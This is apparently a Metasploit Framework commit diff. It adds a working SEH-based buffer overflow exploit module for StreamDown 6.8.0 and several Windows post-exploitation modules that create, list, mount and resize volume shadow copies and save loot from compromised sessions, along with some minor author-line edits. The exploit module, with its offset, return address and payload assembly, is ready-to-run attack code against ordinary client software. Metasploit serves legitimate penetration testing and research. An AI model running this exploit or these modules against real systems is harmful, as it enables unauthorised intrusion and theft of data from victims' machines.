@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Paul Makowski <my.hndl [at] gmail.com>', # original version
|
||||
'Paul Makowski <my.hndl[at]gmail.com>', # original version
|
||||
'jduck' # various fixes, remove most hardcoded addresses
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
|
|
|
@ -0,0 +1,77 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = GoodRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'StreamDown 6.8.0 Buffer overflow',
|
||||
'Description' => %q{
|
||||
Stream Down 6.8.0 seh based buffer overflow triggered when processing
|
||||
the server reponse packet.During the overflow a structured exception
|
||||
handler is overwritten.
|
||||
},
|
||||
'Author' => 'Fady Mohamed Osman <fady.mohamed.osman[at]gmail.com>',
|
||||
'References' =>
|
||||
[
|
||||
['OSVDB', '78043'],
|
||||
['BID', '51190'],
|
||||
['URL', 'http://www.dark-masters.tk/'],
|
||||
['URL', 'http://secunia.com/advisories/47343/'],
|
||||
['URL', 'http://www.exploit-db.com/exploits/18283/']
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'seh',
|
||||
'InitialAutoRunScript' => 'migrate -f'
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'BadChars' => "\x00\xff\x0a"
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
'StreamDown 6.8.0',
|
||||
{
|
||||
'Offset' => 16388,
|
||||
'Ret' => 0x10019448 #POP/POP/RET in DownloadMng.dll
|
||||
}
|
||||
],
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'License' => MSF_LICENSE
|
||||
))
|
||||
end
|
||||
|
||||
def on_request_uri(cli,request)
|
||||
vprint_status("#{cli.peerhost}:#{cli.peerport} requested: #{request.uri}")
|
||||
|
||||
# No point to continue if the client isn't what we interested in
|
||||
ua = request.headers['User-Agent']
|
||||
if ua !~ /CoCSoft Stream Download/i
|
||||
print_error("Target not supported: #{ua}")
|
||||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
|
||||
nseh = "\xeb\x06" + rand_text_alpha(2)
|
||||
seh = [target.ret].pack('V')
|
||||
offset_to_nseh = target['Offset']
|
||||
nops = make_nops(10)
|
||||
sploit = rand_text_alpha(offset_to_nseh) + nseh + seh + nops + payload.encoded
|
||||
cli.put(sploit)
|
||||
close_client(cli)
|
||||
end
|
||||
end
|
|
@ -24,7 +24,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
'Luigi Auriemma', # Original discovery and poc
|
||||
'Celil UNUVER',
|
||||
'TecR0c', # Module Metasploit
|
||||
'TecR0c <roccogiovannicalvi[at]gmail.com>', # Module Metasploit
|
||||
'sinn3r'
|
||||
],
|
||||
'References' =>
|
||||
|
|
|
@ -23,7 +23,7 @@ module Metasploit3
|
|||
'Name' => 'Generic x86 Debug Trap',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => 'Generate a debug trap in the target process',
|
||||
'Author' => 'robert <robertmetasploit [at] gmail.com>',
|
||||
'Author' => 'robert <robertmetasploit[at]gmail.com>',
|
||||
'Platform' => [ 'win', 'linux', 'bsd', 'solaris', 'bsdi', 'osx' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Arch' => ARCH_X86,
|
||||
|
|
|
@ -29,7 +29,7 @@ class Metasploit3 < Msf::Post
|
|||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => "$Revision$",
|
||||
'Author' => [ 'Brandon Perry' ],
|
||||
'Author' => [ 'Brandon Perry <bperry.volatile[at]gmail.com>' ],
|
||||
'Platform' => [ 'windows' ],
|
||||
'SessionTypes' => [ 'meterpreter' ]
|
||||
))
|
||||
|
|
|
@ -22,7 +22,7 @@ class Metasploit3 < Msf::Post
|
|||
'Name' => 'Windows Gather Product Key',
|
||||
'Description' => %q{ This module will enumerate the OS license key },
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [ 'Brandon Perry'],
|
||||
'Author' => [ 'Brandon Perry <bperry.volatile[at]gmail.com>'],
|
||||
'Version' => '$Revision$',
|
||||
'Platform' => [ 'windows' ],
|
||||
'SessionTypes' => [ 'meterpreter' ]
|
||||
|
|
|
@ -0,0 +1,62 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
require 'rex'
|
||||
require 'msf/core/post/windows/shadowcopy'
|
||||
require 'msf/core/post/windows/priv'
|
||||
|
||||
class Metasploit3 < Msf::Post
|
||||
|
||||
include Msf::Post::Windows::Priv
|
||||
include Msf::Post::Windows::ShadowCopy
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "Windows Manage Create Shadow Copy",
|
||||
'Description' => %q{
|
||||
This module will attempt to create a new volume shadow copy.
|
||||
This is based on the VSSOwn Script originally posted by
|
||||
Tim Tomes and Mark Baggett.
|
||||
|
||||
Works on win2k3 and later.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => ['windows'],
|
||||
'SessionTypes' => ['meterpreter'],
|
||||
'Author' => ['thelightcosine <thelightcosine[at]metasploit.com']
|
||||
))
|
||||
register_options(
|
||||
[
|
||||
OptString.new('VOLUME', [ true, 'Volume to make a copy of.', 'C:\\'])
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
|
||||
def run
|
||||
unless is_admin?
|
||||
print_error("This module requires admin privs to run")
|
||||
return
|
||||
end
|
||||
unless start_vss
|
||||
return
|
||||
end
|
||||
id = create_shadowcopy(datastore['VOLUME'])
|
||||
if id
|
||||
print_good "Shadow Copy #{id} created!"
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
|
||||
end
|
|
@ -0,0 +1,76 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
require 'rex'
|
||||
require 'msf/core/post/windows/shadowcopy'
|
||||
require 'msf/core/post/windows/priv'
|
||||
|
||||
class Metasploit3 < Msf::Post
|
||||
|
||||
include Msf::Post::Windows::Priv
|
||||
include Msf::Post::Windows::ShadowCopy
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "Windows Manage List Shadow Copies",
|
||||
'Description' => %q{
|
||||
This module will attempt to list any Volume Shadow Copies
|
||||
on the system. This is based on the VSSOwn Script
|
||||
originally posted by Tim Tomes and Mark Baggett.
|
||||
|
||||
Works on win2k3 and later.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => ['windows'],
|
||||
'SessionTypes' => ['meterpreter'],
|
||||
'Author' => ['thelightcosine <thelightcosine[at]metasploit.com']
|
||||
))
|
||||
end
|
||||
|
||||
|
||||
def run
|
||||
unless is_admin?
|
||||
print_error("This module requires admin privs to run")
|
||||
return
|
||||
end
|
||||
unless start_vss
|
||||
return
|
||||
end
|
||||
|
||||
list = ""
|
||||
shadow_copies = vss_list
|
||||
unless shadow_copies.empty?
|
||||
shadow_copies.each do |copy|
|
||||
tbl = Rex::Ui::Text::Table.new(
|
||||
'Header' => 'Shadow Copy Data',
|
||||
'Indent' => 1,
|
||||
'Columns' => ['Field', 'Value']
|
||||
)
|
||||
copy.each_pair{|k,v| tbl << [k,v]}
|
||||
list << " #{tbl.to_s} \n\n"
|
||||
print_good tbl.to_s
|
||||
end
|
||||
store_loot(
|
||||
'host.shadowcopies',
|
||||
'text/plain',
|
||||
session,
|
||||
list,
|
||||
'shadowcopies.txt',
|
||||
'Shadow Copy Info'
|
||||
)
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
|
||||
end
|
|
@ -0,0 +1,63 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
require 'rex'
|
||||
require 'msf/core/post/windows/shadowcopy'
|
||||
require 'msf/core/post/windows/priv'
|
||||
|
||||
class Metasploit3 < Msf::Post
|
||||
|
||||
include Msf::Post::Windows::Priv
|
||||
include Msf::Post::Windows::ShadowCopy
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "Windows Manage Mount Shadow Copy",
|
||||
'Description' => %q{
|
||||
This module will attempt to mount a Volume Shadow Copy
|
||||
on the system. This is based on the VSSOwn Script
|
||||
originally posted by Tim Tomes and Mark Baggett.
|
||||
|
||||
Works on win2k3 and later.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => ['windows'],
|
||||
'SessionTypes' => ['meterpreter'],
|
||||
'Author' => ['thelightcosine <thelightcosine[at]metasploit.com']
|
||||
))
|
||||
register_options(
|
||||
[
|
||||
OptString.new('DEVICE', [ true, 'DeviceObject of Shadowcopy to mount.' ]),
|
||||
OptString.new('PATH', [ true, 'Path to mount it to.' ])
|
||||
], self.class)
|
||||
|
||||
|
||||
end
|
||||
|
||||
|
||||
def run
|
||||
unless is_admin?
|
||||
print_error("This module requires admin privs to run")
|
||||
return
|
||||
end
|
||||
unless start_vss
|
||||
return
|
||||
end
|
||||
|
||||
r = session.sys.process.execute("cmd.exe /C mklink /D #{datastore['DEVICE']} #{datastore['PATH']}", nil, {'Hidden' => true})
|
||||
|
||||
end
|
||||
|
||||
|
||||
|
||||
end
|
|
@ -0,0 +1,64 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
require 'rex'
|
||||
require 'msf/core/post/windows/shadowcopy'
|
||||
require 'msf/core/post/windows/priv'
|
||||
|
||||
class Metasploit3 < Msf::Post
|
||||
|
||||
include Msf::Post::Windows::Priv
|
||||
include Msf::Post::Windows::ShadowCopy
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "Windows Manage Set Shadow Copy Storage Space",
|
||||
'Description' => %q{
|
||||
This module will attempt to change the ammount of space
|
||||
for volume shadow copy storage. This is based on the
|
||||
VSSOwn Script originally posted by Tim Tomes and
|
||||
Mark Baggett.
|
||||
|
||||
Works on win2k3 and later.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => ['windows'],
|
||||
'SessionTypes' => ['meterpreter'],
|
||||
'Author' => ['thelightcosine <thelightcosine[at]metasploit.com']
|
||||
))
|
||||
register_options(
|
||||
[
|
||||
OptInt.new('SIZE', [ true, 'Size in bytes to set for Max Storage'])
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
|
||||
def run
|
||||
unless is_admin?
|
||||
print_error("This module requires admin privs to run")
|
||||
return
|
||||
end
|
||||
unless start_vss
|
||||
return
|
||||
end
|
||||
if vss_set_storage(datastore['SIZE'])
|
||||
print_good("Size upated successfully")
|
||||
else
|
||||
print_error("There was a problem updating the storage size")
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
|
||||
end
|
|
@ -0,0 +1,73 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
require 'rex'
|
||||
require 'msf/core/post/windows/shadowcopy'
|
||||
require 'msf/core/post/windows/priv'
|
||||
|
||||
class Metasploit3 < Msf::Post
|
||||
|
||||
include Msf::Post::Windows::Priv
|
||||
include Msf::Post::Windows::ShadowCopy
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "Windows Manage Get Shadow Copy Storage Info",
|
||||
'Description' => %q{
|
||||
This module will attempt to get volume shadow copy storage info.
|
||||
This is based on the VSSOwn Script originally posted by
|
||||
Tim Tomes and Mark Baggett.
|
||||
|
||||
Works on win2k3 and later.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => ['windows'],
|
||||
'SessionTypes' => ['meterpreter'],
|
||||
'Author' => ['thelightcosine <thelightcosine[at]metasploit.com']
|
||||
))
|
||||
|
||||
end
|
||||
|
||||
|
||||
def run
|
||||
unless is_admin?
|
||||
print_error("This module requires admin privs to run")
|
||||
return
|
||||
end
|
||||
unless start_vss
|
||||
return
|
||||
end
|
||||
|
||||
storage_data = vss_get_storage
|
||||
if storage_data
|
||||
tbl = Rex::Ui::Text::Table.new(
|
||||
'Header' => 'Shadow Copy Storage Data',
|
||||
'Indent' => 1,
|
||||
'Columns' => ['Field', 'Value']
|
||||
)
|
||||
storage_data.each_pair{|k,v| tbl << [k,v]}
|
||||
print_good(tbl.to_s)
|
||||
store_loot(
|
||||
'host.shadowstorage',
|
||||
'text/plain',
|
||||
session,
|
||||
tbl.to_s,
|
||||
'shadowstorage.txt',
|
||||
'Shadow Copy Storage Info'
|
||||
)
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
|
||||
end
|
|
@ -50,7 +50,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
fd.write(@jar_data)
|
||||
end
|
||||
|
||||
framework.threads.spawn("Module(#{self.refname})-JavaLauncher", false) { system("java -jar payload.jar") }
|
||||
pid = Process.spawn("java -jar payload.jar &")
|
||||
Process.detach pid
|
||||
end
|
||||
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue